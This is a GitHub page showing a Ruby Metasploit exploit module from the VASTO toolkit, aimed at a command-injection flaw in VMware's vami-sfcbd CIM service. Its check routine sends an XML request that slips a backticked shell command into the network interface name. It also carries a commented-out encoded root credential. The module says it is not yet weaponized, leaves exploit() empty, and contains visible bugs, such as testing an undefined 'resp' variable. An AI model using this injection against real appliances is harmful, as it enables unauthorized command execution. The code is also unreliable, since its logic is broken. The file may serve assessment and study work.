-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathvmware_sfcbd_exec.rb
97 lines (86 loc) · 3.18 KB
/
vmware_sfcbd_exec.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#################################################################
# #
# This module is part of VASTO #
# Version 0.4 #
# Virtualization ASsessment TOolkit #
# #
#################################################################
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'VMware VAMI-sfcbd remote command exec',
'Description' => %q{
This module exploits an arbitrary command execution flaw in
the vami-sfcbd module shipped with VMware Studio (and appliances built with it) and VMware Data Recovery.
NOTE: this module is not working at the moment. The exploit code is there, but it has not yet been weaponized.
},
'License' => GPL_LICENSE,
'Version' => '0.1',
'Privileged' => false,
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 512,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(5488)
], self.class)
end
def check
connect
begin
data = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"<<
'<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="7" PROTOCOLVERSION="1.0">'<<
'<SIMPLEREQ><METHODCALL NAME="SetStaticNetworkSetting"><LOCALINSTANCEPATH>'<<
'<LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/>'<<
'</LOCALNAMESPACEPATH><INSTANCENAME CLASSNAME="VAMI_NetworkSetting">'<<
'<KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">`eth0`</KEYVALUE>'<<
'</KEYBINDING><KEYBINDING NAME="ServerName"><KEYVALUE VALUETYPE="string">'<<
'</KEYVALUE></KEYBINDING></INSTANCENAME></LOCALINSTANCEPATH>'<<
'<PARAMVALUE NAME="Address" PARAMTYPE="string"><VALUE>1.1.1.1</VALUE>'<<
'</PARAMVALUE><PARAMVALUE NAME="Gateway" PARAMTYPE="string">'<<
'<VALUE>1.1.1.1</VALUE></PARAMVALUE><PARAMVALUE NAME="SubnetMask" PARAMTYPE="string">'<<
'<VALUE>255.255.255.0</VALUE></PARAMVALUE></METHODCALL></SIMPLEREQ></MESSAGE></CIM>'
res = send_request_raw({
'uri' => "/cimom",
'method' => 'POST',
'vhost' => ip,
'data' => data,
'headers' =>
{
'Content-Type' => 'application/xml; charset="utf-8"',
'Content-Length' => data.length,
'CIMProtocolVersion' => '1.0',
'CIMOperation' => 'MethodCall',
'CIMObject' => '%72%6F%6F%74/%63%69%6D%762%3A%56%41%4D%49_%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67.%4E%61%6D%65%3D%22%65%74%680%22%2C%53%65%72%76%65%72%4E%61%6D%65%3D%22%41%41%41%41%22',
'CIMMethod' => '%53%65%74%53%74%61%74%69%63%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67'
#Authorization: Basic cm9vdDozMmFjNDYwOC0yZmU0LTQwZjQtODQ1ZC05YzY4ZTBmY2U4M2I=
}
}, 25)
if (resp =~ /<VALUE>0<\/VALUE>/)
begin
print_status("Response: #{resp.strip}")
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
end
end
def exploit
#TBD
end
end